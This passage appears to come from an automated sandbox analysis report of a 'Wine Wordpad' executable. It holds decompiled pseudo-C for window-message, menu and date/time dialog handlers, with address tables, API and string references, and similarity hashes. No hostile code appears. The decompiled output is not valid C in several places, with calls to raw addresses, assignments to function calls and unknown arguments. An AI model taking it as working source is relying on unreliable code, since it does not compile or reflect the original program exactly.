								L116:
								SendMessageW(_t307, ??, ??, ??);
								goto L141;
							}
							if(__eflags == 0) {
								_push(0);
								_push(E0040531A);
								_push(_t256);
								_push(0x837);
								L126:
								DialogBoxParamW(GetModuleHandleW(0), ??, ??, ??, ??);
								goto L141;
							}
							_t271 = _t266 - 0x5de;
							__eflags = _t271;
							if(_t271 == 0) {
								_t161 = E00404398(_t143, 1);
								asm("sbb eax, eax");
								E0040517A( ~_t161 + 1);
								L103:
								E00405924();
								goto L141;
							}
							_t274 = _t271 - 1;
							__eflags = _t274;
							if(_t274 == 0) {
								_t166 = E00404398(_t143, 0);
								asm("sbb eax, eax");
								_push( ~_t166 + 1);
								_push(0);
								L102:
								E004051AE();
								goto L103;
							}
							_t275 = _t274 - 0x61;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0);
								_push(E0040388A);
								_push(_t256);
								_push(0x834);
								goto L126;
							}
							_t276 = _t275 - 1;
							__eflags = _t276;
							if(_t276 != 0) {
								goto L134;
							}
							_push(_t276);
							_push(E004046CC);
							_push(_t256);
							_push(0x836);
							goto L126;
						}
						if(__eflags == 0) {
							_t310 = 3;
							_t170 = E00404398(_t143, _t310);
							asm("sbb eax, eax");
							_t174 = E00404398(E004051AE(4,  ~_t170 + 1), _t310);
							asm("sbb eax, eax");
							_t178 = E00404398(E004051AE(5,  ~_t174 + 1), _t310);
							asm("sbb eax, eax");
							E004051AE(_t310,  ~_t178 + 1);
							goto L103;
						}
						__eflags = _t309 - 0x578;
						if(__eflags > 0) {
							_t277 = _t266 - 0x579;
							__eflags = _t277;
							if(_t277 == 0) {
								L110:
								memset( &_v140, 0, 0x70);
								_v144 = 0x74;
								SendMessageW(_t307, 0x43a, 1,  &_v144);
								_t278 = _v16;
								_v140 = 1;
								__eflags = _t278 - 0x579;
								if(_t278 != 0x579) {
									__eflags = _t278 - 0x57a;
									if(_t278 != 0x57a) {
										L115:
										_t130 =  &_v136;
										 *_t130 = _v136 ^ 1;
										__eflags =  *_t130;
										_push( &_v144);
										_push(1);
										_push(0x444);
										goto L116;
									}
									_push(4);
									L114:
									_pop(1);
									_v140 = 1;
									goto L115;
								}
								_push(2);
								goto L114;
							}
							_t279 = _t277 - 1;
							__eflags = _t279;
							if(_t279 == 0) {
								goto L110;
							}
							_t280 = _t279 - 1;
							__eflags = _t280;
							if(_t280 == 0) {
								_t313 = GetDlgItem(GetDlgItem(_t256, 0x7d4), 0x7d3);
								SendMessageW(_t313, 0x41d, SendMessageW(_t313, 0x419, 0x57b, 0),  &_v28);
								_v12 = _v28;
								_v8 = _v16;
								ClientToScreen(_t313,  &_v12);
								_t198 = TrackPopupMenu(GetSubMenu( *0x408034, 0), 0x180, _v12, _v8, 0, _a4, 0);
								_a12 = _t198;
								__eflags = _t198 + 0xfffff8f8 - 0x10;
								if(_t198 + 0xfffff8f8 > 0x10) {
									goto L141;
								}
								memset( &_v140, 0, 0x70);
								_v144 = 0x74;
								SendMessageW(_t307, 0x43a, 1,  &_v144);
								_t204 = _a12;
								_v140 = 0x40000000;
								__eflags = _t204 - 0x718;
								if(_t204 >= 0x718) {
									_t121 =  &_v136;
									 *_t121 = _v136 | 0x40000000;
									__eflags =  *_t121;
								} else {
									_v136 = _v136 & 0xbfffffff;
									_v124 =  *((intOrPtr*)(0x4047c0 + _t204 * 4));
								}
								_push( &_v144);
								_push(1);
								_push(0x444);
								L109:
								SendMessageW(_t307, ??, ??, ??);
								goto L141;
							}
							__eflags = _t280 != 0x61;
							if(_t280 != 0x61) {
								goto L134;
							}
							_t315 = 2;
							_t208 = E00404398(_t143, _t315);
							asm("sbb eax, eax");
							_t210 =  ~_t208 + 1;
							__eflags = _t210;
							_push(_t210);
							_push(_t315);
							goto L102;
						}
						if(__eflags == 0) {
							goto L110;
						}
						_t284 = _t266 - 0x525;
						__eflags = _t284;
						if(_t284 == 0) {
							L86:
							_v216 = 0xbc;
							_t316 = _t302 - 0x00000522 & 0x0000ffff;
							_v212 = 0x20;
							SendMessageW(_t307, 0x43d, 0,  &_v216);
							_t304 = _v208;
							_v212 = 0x8000e024;
							__eflags = _t304;
							if(_t304 == 0) {
								_t285 = _v16;
								L91:
								_a12 = _a12 & 0;
								__eflags = _t304;
								_t216 =  !=  ? _a12 : 0x168;
								_v204 =  !=  ? _a12 : 0x168;
								__eflags = _t285 - 0x522;
								if(_t285 != 0x522) {
									_v208 = _t316;
									 *0x408014 = _t316;
								} else {
									_v208 =  *0x408014;
								}
								_v38 = 0x1680200;
								__eflags = 1;
								_v40 = 1;
								_v196 = 0x168;
								L95:
								_push( &_v216);
								_push(0);
								L96:
								_push(0x447);
								goto L116;
							}
							__eflags = _t304 - _t316;
							if(_t304 == _t316) {
								L89:
								_v196 = 0;
								_v208 = 0;
								_v40 = 0;
								_v36 = 0;
								_v204 = 0xfffffe98;
								goto L95;
							}
							_t285 = _v16;
							__eflags = _t285 - 0x522;
							if(_t285 != 0x522) {
								goto L91;
							}
							goto L89;
						}
						_t286 = _t284 - 1;
						__eflags = _t286;
						if(_t286 == 0) {
							goto L86;
						}
						_t287 = _t286 - 1;
						__eflags = _t287;
						if(_t287 == 0) {
							goto L86;
						}
						_t288 = _t287 - 1;
						__eflags = _t288;
						if(_t288 == 0) {
							goto L86;
						}
						__eflags = _t288 != 0xa;
						if(_t288 != 0xa) {
							goto L134;
						}
						E004039F6();
						goto L141;
					}
					if(__eflags == 0) {
						goto L86;
					}
					__eflags = _t309 - 0x51a;
					if(__eflags > 0) {
						_t290 = _t266 - 0x51b;
						__eflags = _t290 - 8;
						if(_t290 > 8) {
							goto L134;
						}
						switch( *((intOrPtr*)(_t290 * 4 +  &M00402374))) {
							case 0:
								_push(0);
								_push(0);
								_push(0xc7);
								goto L116;
							case 1:
								_push(0);
								_push(0);
								_push(0x454);
								goto L116;
							case 2:
								__ebx = GetWindowTextLengthW(__edi);
								_a12 = __ebx;
								__eax = 2 + __ebx * 2;
								__eax = GetProcessHeap();
								__edi = HeapAlloc;
								__eax = HeapAlloc(__eax, 0, 2 + __ebx * 2);
								_t67 =  &(__ebx->i); // 0x1
								__ecx = _t67;
								__esi = __eax;
								__eax = GetWindowTextW(_v8, __esi, _t67);
								__ebx = 0;
								__eax = MessageBoxW(0, __esi, L"Wine Wordpad", 0);
								__esi = GetProcessHeap;
								__eax = GetProcessHeap();
								__ebx = HeapFree;
								__eax = HeapFree(__eax, 0, GetProcessHeap);
								__ecx = _a12;
								__eax = 2 + __ecx * 2;
								__eax = GetProcessHeap();
								__esi = __eax;
								__edi = 0;
								__eax = _a12;
								_v20 = _a12;
								__eax =  &_v24;
								_v24 = 0;
								_v16 = __esi;
								SendMessageW(_v8, 0x44b, 0,  &_v24) = MessageBoxW(0, __esi, L"Wine Wordpad", 0);
								GetProcessHeap() = HeapFree(__eax, 0, __esi);
								goto L141;
							case 3:
								_push(0);
								_push(0);
								_push(0x301);
								goto L69;
							case 4:
								_push(0);
								_push(0);
								_push(0x300);
								goto L69;
							case 5:
								_push(0);
								_push(0);
								_push(0x302);
								goto L69;
							case 6:
								_push(0);
								_push(0);
								_push(0x303);
								L69:
								_push(_t307);
								L6:
								PostMessageW();
								goto L141;
							case 7:
								goto L86;
						}
					}
					if(__eflags == 0) {
						L65:
						memset( &_v136, 0, 0x6c);
						_v140 = _v140 & 0x00000000;
						_v144 = 0x74;
						_push( &_v144);
						__eflags = _v16 - 0x518;
						_push(0 | _v16 == 0x00000518);
						_push(0x43a);
						goto L116;
					}
					__eflags = _t309 - 0x515;
					if(__eflags > 0) {
						_t292 = _t266 - 0x516;
						__eflags = _t292;
						if(_t292 == 0) {
							_t232 = GetWindowLongW(_t307, 0xfffffff0);
							_push(0);
							__eflags = _t232 & 0x00000800;
							if((_t232 & 0x00000800) == 0) {
								_push(1);
							} else {
								_push(0);
							}
							_push(0xcf);
							goto L116;
						}
						_t293 = _t292 - 1;
						__eflags = _t293;
						if(_t293 == 0) {
							_t233 = SendMessageW(_t307, 0xb8, 0, 0);
							_push(0);
							__eflags = _t233;
							if(_t233 == 0) {
								_push(1);
							} else {
								_push(0);
							}
							_push(0xb9);
							goto L109;
						}
						_t294 = _t293 - 1;
						__eflags = _t294;
						if(_t294 == 0) {
							goto L65;
						}
						_t295 = _t294 - 1;
						__eflags = _t295;
						if(_t295 != 0) {
							goto L134;
						}
						memset( &_v212, _t295, 0xb8);
						_v216 = 0xbc;
						_push( &_v216);
						_push(0);
						_push(0x43d);
						goto L116;
					}
					if(__eflags == 0) {
						_v16 = _v16 | 0xffffffff;
						_v20 = 0;
						SendMessageW(_t307, 0x434, 0,  &_v20);
						_t308 = HeapAlloc(GetProcessHeap(), 0, 2 + (_v16 - _v20) * 2);
						SendMessageW(_v8, 0x43e, 0, _t308);
						_push(_v16);
						E00405253( &_v156, "Start = %d, End = %d", _v20);
						MessageBoxA(_a4,  &_v156, "Editor", 0);
						MessageBoxW(_a4, _t308, L"Wine Wordpad", 0);
						HeapFree(GetProcessHeap(), 0, _t308);
						goto L141;
					}
					_t296 = _t266 - 0x44d;
					__eflags = _t296;
					if(_t296 == 0) {
						L42:
						_v216 = 0xbc;
						_v212 = 8;
						_t320 = _t309 - 0x44c;
						__eflags = _t320;
						if(_t320 == 0) {
							__eflags = 1;
							L49:
							_v192 = 1;
							L50:
							_push( &_v216);
							_push(0);
							goto L96;
						}
						_t321 = _t320 - 1;
						__eflags = _t321;
						if(_t321 == 0) {
							_push(3);
							L46:
							_pop(1);
							goto L49;
						}
						__eflags = _t321 != 1;
						if(_t321 != 1) {
							goto L50;
						}
						_push(2);
						goto L46;
					}
					_t297 = _t296 - 1;
					__eflags = _t297;
					if(_t297 == 0) {
						goto L42;
					}
					_t298 = _t297 - 0x62;
					__eflags = _t298;
					if(_t298 == 0) {
						_push(0);
						_push(1);
						L41:
						_push(0x443);
						goto L116;
					}
					_t299 = _t298 - 1;
					__eflags = _t299;
					if(_t299 == 0) {
						_push(0xc0ffff);
						_push(0);
						goto L41;
					}
					_t300 = _t299 - 0x63;
					__eflags = _t300;
					if(_t300 != 0) {
						goto L134;
					}
					_v12 = _v12 & _t300;
					_v8 = _v8 | 0xffffffff;
					_push( &_v12);
					_push(_t300);
					_push(0x437);
					goto L116;
				}
				if(_t334 == 0) {
					goto L42;
				}
				_t301 = _t266 - 0x3e8;
				if(_t301 > 0x10) {
					goto L134;
				}
				switch( *((intOrPtr*)(_t301 * 4 +  &M00402330))) {
					case 0:
						_push(0);
						_push(0);
						_push(0x10);
						_push(_t256);
						goto L6;
					case 1:
						__eax = E0040123D();
						goto L141;
					case 2:
						__eflags =  *0x408050;
						if( *0x408050 == 0) {
							goto L15;
						}
						__eax = E00401677(__ecx, 0x408050,  *0x408010);
						goto L13;
					case 3:
						__ebx = 0;
						__eax = GetModuleHandleW(0);
						__edi = __eax;
						__eflags = __edi - 0x64;
						if(__edi != 0x64) {
							__eax = E00404E0F();
							__eflags = __eax;
							if(__eax != 0) {
								E00404F82(0) = 0;
								 *0x408050 = __ax;
								__eax = E00403847();
								__esi = SendMessageW;
								__eax =  &_v12;
								_v12 = 0;
								_v8 = 0x4b0;
								SendMessageW( *0x40802c, 0x461,  &_v12, 0) = SendMessageW( *0x40802c, 0xb9, 0, 0);
								 *0x408010 = __edi;
								E00404F21(__eflags) = E0040502E();
								__eax = E004057AA();
							}
						}
						goto L141;
					case 4:
						L15:
						__eax = E004012DB();
						goto L141;
					case 5:
						__eax = GetMenu(__ebx);
						__ecx =  &_v76;
						_v76 = 0x30;
						_v72 = 0x20;
						__eax = GetMenuItemInfoW(__eax, __esi, 0, __ecx);
						__eflags = __eax;
						if(__eax == 0) {
							goto L141;
						}
						__eax = E004014EA(__ecx, _v44);
						goto L14;
					case 6:
						goto L134;
					case 7:
						_push(0x408050);
						_push(__ebx);
						0x400000();
						goto L13;
					case 8:
						_push( *0x408010);
						__eax = __eax ^ 0x00408010;
						0x400000();
						__edi = __eax;
						_pop(__ecx);
						__esi =  *(0x408044 + __edi * 4);
						 *(0x408044 + __edi * 4) = 2;
						__eax = E00404F21(__eflags);
						__ebx = 0;
						__eax = ShowWindow( *0x40802c, 0);
						_push(0x408050);
						_push(_a4);
						0x400000();
						_pop(__ecx);
						_pop(__ecx);
						SetMenu(_a4, 0) = InvalidateRect(0, 0, 1);
						goto L141;
					case 9:
						_push(__ebx);
						0x400000();
						goto L14;
					case 0xa:
						_push(0x408050);
						_push( *0x408028);
						0x400000();
						goto L13;
					case 0xb:
						_push(0);
						goto L19;
					case 0xc:
						__eax = E00404195(0x409988);
						goto L14;
					case 0xd:
						_push(1);
						L19:
						_push(0x409988);
						__eax = E00403BBF();
						L13:
						_pop(__ecx);
						L14:
						_pop(__ecx);
						goto L141;
				}
			}

0x00401932
0x00401943
0x00401945
0x0040194b
0x00402329
0x0040232d
0x0040232d
0x00401951
0x00401954
0x00401957
0x0040195a
0x0040195d
0x0040195f
0x00401965
0x00401b46
0x00401b4c
0x00401e97
0x00401e9d
0x004021da
0x004021dc
0x0040226a
0x0040226a
0x00402270
0x00402321
0x00000000
0x00402321
0x00402276
0x00402276
0x00402279
0x004022f0
0x00000000
0x004022f0
0x0040227b
0x0040227b
0x00402281
0x004022ce
0x004022d2
0x004022dd
0x004022e6
0x004022eb
0x00000000
0x004022d2
0x00402283
0x00402286
0x00402299
0x0040229d
0x004022b2
0x004022c1
0x004022c6
0x00000000
0x0040229d
0x00402288
0x00402288
0x0040228b
0x0040228c
0x00402186
0x00402187
0x00000000
0x00402187
0x004021e2
0x0040225b
0x0040225d
0x00402262
0x00402263
0x0040221a
0x00402223
0x00000000
0x00402223
0x004021e4
0x004021e4
0x004021ea
0x00402244
0x0040224b
0x0040224f
0x00402007
0x00402007
0x00000000
0x00402007
0x004021ec
0x004021ec
0x004021ef
0x00402230
0x00402237
0x0040223a
0x0040223b
0x00401fff
0x00401fff
0x00000000
0x00402004
0x004021f1
0x004021f1
0x004021f4
0x0040220d
0x0040220f
0x00402214
0x00402215
0x00000000
0x00402215
0x004021f6
0x004021f6
0x004021f9
0x00000000
0x00000000
0x004021ff
0x00402200
0x00402205
0x00402206
0x00000000
0x00402206
0x00401ea3
0x00402194
0x00402196
0x0040219d
0x004021a9
0x004021b0
0x004021bc
0x004021c3
0x004021c8
0x00000000
0x004021cd
0x00401ea9
0x00401eaf
0x00401fcc
0x00401fcc
0x00401fd2
0x00402113
0x00402123
0x0040212b
0x00402143
0x00402149
0x00402151
0x00402157
0x0040215a
0x00402165
0x00402168
0x00402173
0x00402173
0x00402173
0x00402173
0x0040217f
0x00402180
0x00402181
0x00000000
0x00402181
0x0040216a
0x0040216c
0x0040216c
0x0040216d
0x00000000
0x0040216d
0x0040215c
0x00000000
0x0040215c
0x00401fd8
0x00401fd8
0x00401fdb
0x00000000
0x00000000
0x00401fe1
0x00401fe1
0x00401fe4
0x00402029
0x00402048
0x00402051
0x00402057
0x0040205f
0x00402083
0x00402089
0x00402091
0x00402094
0x00000000
0x00000000
0x004020a4
0x004020b8
0x004020cb
0x004020cd
0x004020d5
0x004020db
0x004020e0
0x004020f8
0x004020f8
0x004020f8
0x004020e2
0x004020e9
0x004020f3
0x004020f3
0x00402104
0x00402105
0x00402106
0x0040210b
0x0040210c
0x00000000
0x0040210c
0x00401fe6
0x00401fe9
0x00000000
0x00000000
0x00401ff1
0x00401ff3
0x00401ffa
0x00401ffc
0x00401ffc
0x00401ffd
0x00401ffe
0x00000000
0x00401ffe
0x00401eb5
0x00000000
0x00000000
0x00401ebb
0x00401ebb
0x00401ec1
0x00401ee5
0x00401eeb
0x00401ef5
0x00401f00
0x00401f12
0x00401f18
0x00401f24
0x00401f2e
0x00401f31
0x00401f62
0x00401f65
0x00401f65
0x00401f6d
0x00401f70
0x00401f74
0x00401f7f
0x00401f82
0x00401f95
0x00401f9c
0x00401f84
0x00401f8a
0x00401f8a
0x00401fa3
0x00401faa
0x00401fab
0x00401fb4
0x00401fba
0x00401fc0
0x00401fc1
0x00401fc2
0x00401fc2
0x00000000
0x00401fc2
0x00401f33
0x00401f36
0x00401f40
0x00401f42
0x00401f48
0x00401f4f
0x00401f52
0x00401f56
0x00000000
0x00401f56
0x00401f38
0x00401f3b
0x00401f3e
0x00000000
0x00000000
0x00000000
0x00401f3e
0x00401ec3
0x00401ec3
0x00401ec6
0x00000000
0x00000000
0x00401ec8
0x00401ec8
0x00401ecb
0x00000000
0x00000000
0x00401ecd
0x00401ecd
0x00401ed0
0x00000000
0x00000000
0x00401ed2
0x00401ed5
0x00000000
0x00000000
0x00401edb
0x00000000
0x00401edb
0x00401b52
0x00000000
0x00000000
0x00401b5d
0x00401b5f
0x00401d8a
0x00401d90
0x00401d93
0x00000000
0x00000000
0x00401d99
0x00000000
0x00401e7b
0x00401e7d
0x00401e7f
0x00000000
0x00000000
0x00401e89
0x00401e8b
0x00401e8d
0x00000000
0x00000000
0x00401dd7
0x00401dd9
0x00401ddc
0x00401de6
0x00401dec
0x00401df3
0x00401df5
0x00401df5
0x00401df8
0x00401dff
0x00401e05
0x00401e0f
0x00401e16
0x00401e1d
0x00401e1f
0x00401e26
0x00401e28
0x00401e2b
0x00401e35
0x00401e3a
0x00401e3c
0x00401e3e
0x00401e41
0x00401e44
0x00401e51
0x00401e54
0x00401e65
0x00401e74
0x00000000
0x00000000
0x00401daf
0x00401db1
0x00401db3
0x00000000
0x00000000
0x00401da0
0x00401da2
0x00401da4
0x00000000
0x00000000
0x00401dba
0x00401dbc
0x00401dbe
0x00000000
0x00000000
0x00401dc5
0x00401dc7
0x00401dc9
0x00401da9
0x00401da9
0x0040198e
0x0040198e
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d99
0x00401b65
0x00401d44
0x00401d4f
0x00401d54
0x00401d6c
0x00401d76
0x00401d79
0x00401d7f
0x00401d80
0x00000000
0x00401d80
0x00401b6e
0x00401b70
0x00401cab
0x00401cab
0x00401cb1
0x00401d25
0x00401d2b
0x00401d2d
0x00401d32
0x00401d38
0x00401d34
0x00401d34
0x00401d34
0x00401d3a
0x00000000
0x00401d3a
0x00401cb3
0x00401cb3
0x00401cb6
0x00401d0c
0x00401d0e
0x00401d0f
0x00401d11
0x00401d16
0x00401d13
0x00401d13
0x00401d13
0x00401d18
0x00000000
0x00401d18
0x00401cb8
0x00401cb8
0x00401cbb
0x00000000
0x00000000
0x00401cc1
0x00401cc1
0x00401cc4
0x00000000
0x00000000
0x00401cd7
0x00401cdf
0x00401cef
0x00401cf0
0x00401cf2
0x00000000
0x00401cf2
0x00401b76
0x00401c10
0x00401c27
0x00401c2a
0x00401c4a
0x00401c57
0x00401c59
0x00401c6b
0x00401c85
0x00401c95
0x00401ca0
0x00000000
0x00401ca0
0x00401b7c
0x00401b7c
0x00401b82
0x00401bc9
0x00401bc9
0x00401bd3
0x00401bdd
0x00401bdd
0x00401be3
0x00401bfa
0x00401bfb
0x00401bfb
0x00401c02
0x00401c08
0x00401c09
0x00000000
0x00401c09
0x00401be5
0x00401be5
0x00401be8
0x00401bf4
0x00401bf1
0x00401bf1
0x00000000
0x00401bf1
0x00401bea
0x00401bed
0x00000000
0x00000000
0x00401bef
0x00000000
0x00401bef
0x00401b84
0x00401b84
0x00401b87
0x00000000
0x00000000
0x00401b89
0x00401b89
0x00401b8c
0x00401bbb
0x00401bbd
0x00401bbf
0x00401bbf
0x00000000
0x00401bbf
0x00401b8e
0x00401b8e
0x00401b91
0x00401bb2
0x00401bb7
0x00000000
0x00401bb7
0x00401b93
0x00401b93
0x00401b96
0x00000000
0x00000000
0x00401b9c
0x00401ba2
0x00401ba6
0x00401ba7
0x00401ba8
0x00000000
0x00401ba8
0x0040196b
0x00000000
0x00000000
0x00401971
0x0040197a
0x00000000
0x00000000
0x00401980
0x00000000
0x00401987
0x00401989
0x0040198b
0x0040198d
0x00000000
0x00000000
0x00401a2e
0x00000000
0x00000000
0x00401a38
0x00401a40
0x00000000
0x00000000
0x00401a4d
0x00000000
0x00000000
0x00401999
0x0040199c
0x004019b7
0x004019b9
0x004019bc
0x004019c2
0x004019c7
0x004019c9
0x004019d5
0x004019d8
0x004019de
0x004019e3
0x004019e9
0x004019f9
0x004019fc
0x00401a12
0x00401a14
0x00401a1f
0x00401a24
0x00401a24
0x004019c9
0x00000000
0x00000000
0x00401a59
0x00401a59
0x00000000
0x00000000
0x00401a64
0x00401a6a
0x00401a6d
0x00401a79
0x00401a80
0x00401a86
0x00401a88
0x00000000
0x00000000
0x00401a91
0x00000000
0x00000000
0x00000000
0x00000000
0x00401ab6
0x00401abb
0x00401abc
0x00000000
0x00000000
0x00401ad8
0x00401ad9
0x00401ade
0x00401ae3
0x00401ae5
0x00401ae6
0x00401aed
0x00401af8
0x00401afd
0x00401b0d
0x00401b13
0x00401b18
0x00401b1b
0x00401b20
0x00401b21
0x00401b30
0x00000000
0x00000000
0x00401b3b
0x00401b3c
0x00000000
0x00000000
0x00401ac3
0x00401ac8
0x00401ace
0x00000000
0x00000000
0x00401a98
0x00000000
0x00000000
0x00401aab
0x00000000
0x00000000
0x00401ab2
0x00401a9a
0x00401a9a
0x00401a9f
0x00401a52
0x00401a52
0x00401a53
0x00401a53
0x00000000
0x00000000

APIs

GetDlgItem.USER32 ref: 0040193D
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0040198E
GetModuleHandleW.KERNEL32(00000000), ref: 0040199C
DialogBoxParamW.USER32 ref: 004019B1
SendMessageW.USER32(00000461,?,00000000), ref: 00401A03
SendMessageW.USER32(000000B9,00000000,00000000), ref: 00401A12
GetMenu.USER32(00000000), ref: 00401A64
GetMenuItemInfoW.USER32 ref: 00401A80
SendMessageW.USER32(00000000,00000444,00000001,00000074), ref: 00402187

Strings

0, xrefs: 00401A6D
Start = %d, End = %d, xrefs: 00401C65
t, xrefs: 0040212B
$, xrefs: 00401F24
Wine Wordpad, xrefs: 00401C8C, 00401E08, 00401E5E, 00402316
Editor, xrefs: 00401C7C
, xrefs: 00401A79

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ItemMenu$DialogHandleInfoModuleParamPost
String ID: $$$0$Editor$Start = %d, End = %d$Wine Wordpad$t
API String ID: 732634091-4181186191
Opcode ID: 20f62c6f03ce511d8257c21f7224efeaccf3f3a95fcbb585acb0fc985e111cc1
Instruction ID: ced3e964e74ec40292947e96d6ed4b305a48bc7392e9795acfe01eea6a42969f
Opcode Fuzzy Hash: 20f62c6f03ce511d8257c21f7224efeaccf3f3a95fcbb585acb0fc985e111cc1
Instruction Fuzzy Hash: E132E571940219BBEB20AFA48D49FBB767CFB04704F10417BFA06B61D1D6BC5A448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040388A, Relevance: 21.1, APIs: 14, Instructions: 119
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040388A(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				struct _SYSTEMTIME _v20;
				void* _v532;
				void* _t19;
				void* _t38;
				void* _t41;
				int _t43;
				void* _t49;
				struct HWND__* _t54;
				struct HWND__* _t56;
				int _t66;

				_t19 = _a8 - 0x110;
				if(_t19 == 0) {
					_t54 = GetDlgItem(_a4, 0x7d6);
					GetLocalTime( &_v20);
					GetDateFormatW(0x400, 1,  &_v20, 0,  &_v532, 0xff);
					SendMessageW(_t54, 0x180, 0,  &_v532);
					GetDateFormatW(0x400, 2,  &_v20, 0,  &_v532, 0xff);
					SendMessageW(_t54, 0x180, 0,  &_v532);
					GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0xff);
					SendMessageW(_t54, 0x180, 0,  &_v532);
					SendMessageW(_t54, 0x185, 1, 0);
					L10:
					_t38 = 0;
					L11:
					return _t38;
				}
				if(_t19 != 1) {
					goto L10;
				}
				_t66 = _a12;
				_t41 = (_t66 & 0x0000ffff) - 1;
				if(_t41 == 0) {
					L6:
					_t56 = GetDlgItem(_a4, 0x7d6);
					_t43 = SendMessageW(_t56, 0x188, 0, 0);
					if(_t43 != 0xffffffff) {
						SendMessageW(_t56, 0x189, _t43,  &_v532);
						SendMessageW( *0x40802c, 0xc2, 1,  &_v532);
					}
					L8:
					EndDialog(_a4, _t66);
					_t38 = 1;
					goto L11;
				}
				_t49 = _t41 - 1;
				if(_t49 == 0) {
					goto L8;
				}
				if(_t49 != 0x7d4 || _t66 >> 0x10 != 2) {
					goto L10;
				} else {
					goto L6;
				}
			}

0x00403899
0x0040389e
0x00403944
0x0040394a
0x0040396f
0x00403986
0x004039a1
0x004039b3
0x004039cc
0x004039e0
0x004039eb
0x004039ed
0x004039ed
0x004039ef
0x004039f3
0x004039f3
0x004038a7
0x00000000
0x00000000
0x004038ad
0x004038b3
0x004038b6
0x004038d7
0x004038eb
0x004038f7
0x004038fc
0x0040390c
0x00403922
0x00403922
0x00403924
0x00403928
0x00403930
0x00000000
0x00403930
0x004038b8
0x004038bb
0x00000000
0x00000000
0x004038c2
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetDlgItem.USER32 ref: 004038DF
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 004038F7
SendMessageW.USER32(00000000,00000189,00000000,?), ref: 0040390C
SendMessageW.USER32(000000C2,00000001,?), ref: 00403922
EndDialog.USER32(?,?), ref: 00403928
GetDlgItem.USER32 ref: 0040393E
GetLocalTime.KERNEL32(?), ref: 0040394A
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,000000FF), ref: 0040396F
SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00403986
GetDateFormatW.KERNEL32(00000400,00000002,?,00000000,?,000000FF), ref: 004039A1
SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004039B3
GetTimeFormatW.KERNEL32(00000400,00000000,?,00000000,?,000000FF), ref: 004039CC
SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004039E0
SendMessageW.USER32(00000000,00000185,00000001,00000000), ref: 004039EB

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Format$DateItemTime$DialogLocal
String ID:
API String ID: 4141906856-0
Opcode ID: 136ffa5fa48c814a70dca3b1bb84b77b5145572ebc566d1ab77621e0f26ecffb
Instruction ID: cea8acb6379d832626e2cf68680e01007423a738102e81183ae62970f4be5748
Opcode Fuzzy Hash: 136ffa5fa48c814a70dca3b1bb84b77b5145572ebc566d1ab77621e0f26ecffb
Instruction Fuzzy Hash: DB3192B168021D7AEB20DB64CC8AFFB3A6CEB04711F014531FA15FA1D1D6F5AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404E0F, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 91
memorywindowstringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404E0F() {
				intOrPtr _v8;
				void* _v12;
				void* __ecx;
				void* _t6;
				WCHAR* _t7;
				int _t8;
				int _t9;
				int _t13;
				WCHAR* _t21;
				void* _t22;
				void* _t30;
				void* _t36;

				_push(_t22);
				_push(_t22);
				if( *0x408050 != 0) {
					L2:
					if(SendMessageW( *0x40802c, 0xb8, 0, 0) == 0) {
						L13:
						_t6 = 1;
						L14:
						return _t6;
					}
					if( *0x408050 != 0) {
						_t7 = E00403E2D(0x408050);
						_pop(_t22);
						_t21 = _t7;
					} else {
						_t21 = 0x408a80;
					}
					_t8 = lstrlenW(_t21);
					_t9 = lstrlenW(0x408c80);
					_t30 = HeapAlloc(GetProcessHeap(), 8, _t8 + _t9 + _t8 + _t9);
					if(_t30 == 0) {
						L9:
						_t6 = 0;
						goto L14;
					} else {
						wsprintfW(_t30, 0x408c80, _t21);
						_t13 = MessageBoxW( *0x408028, _t30, L"Wine Wordpad", 0x33);
						HeapFree(GetProcessHeap(), 0, _t30);
						_t36 = _t13 - 6;
						if(_t36 == 0) {
							if( *0x408050 == 0) {
								_t6 = E004012DB();
							} else {
								_t6 = E00401677(_t22, 0x408050,  *0x408010);
							}
							goto L14;
						}
						if(_t36 == 1) {
							goto L13;
						}
						goto L9;
					}
				}
				_v12 = 8;
				_v8 = 0x4b0;
				if(SendMessageW( *0x40802c, 0x45f,  &_v12, 0) == 0) {
					goto L13;
				}
				goto L2;
			}

0x00404e12
0x00404e13
0x00404e26
0x00404e50
0x00404e61
0x00404f19
0x00404f1b
0x00404f1c
0x00404f20
0x00404f20
0x00404e6e
0x00404e7c
0x00404e81
0x00404e82
0x00404e70
0x00404e70
0x00404e70
0x00404e8b
0x00404e94
0x00404eaa
0x00404eae
0x00404ef0
0x00404ef0
0x00000000
0x00404eb0
0x00404eb7
0x00404ece
0x00404ee0
0x00404ee6
0x00404ee9
0x00404efc
0x00404f12
0x00404efe
0x00404f09
0x00404f0f
0x00000000
0x00404efc
0x00404eee
0x00000000
0x00000000
0x00000000
0x00404eee
0x00404eae
0x00404e2c
0x00404e3f
0x00404e4a
0x00000000
0x00000000
0x00000000

APIs

SendMessageW.USER32(0000045F,?,00000000), ref: 00404E46

Part of subcall function 00403E2D: lstrlenW.KERNEL32(00000000,00401134,?,00404F9D,00000000,00000000,00401134,?), ref: 00403E35

